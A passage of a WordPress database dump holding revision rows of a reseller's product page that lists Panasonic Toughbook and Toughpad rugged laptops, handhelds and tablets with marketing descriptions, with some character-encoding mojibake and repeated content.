TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:46:48','2018-12-21 01:46:48','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2680,1,'2018-12-21 09:47:13','2018-12-21 01:47:13','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header>PRODUCT DETAILS<p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:47:13','2018-12-21 01:47:13','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2681,1,'2018-12-21 09:47:34','2018-12-21 01:47:34','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header>PRODUCT DETAILS<p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with 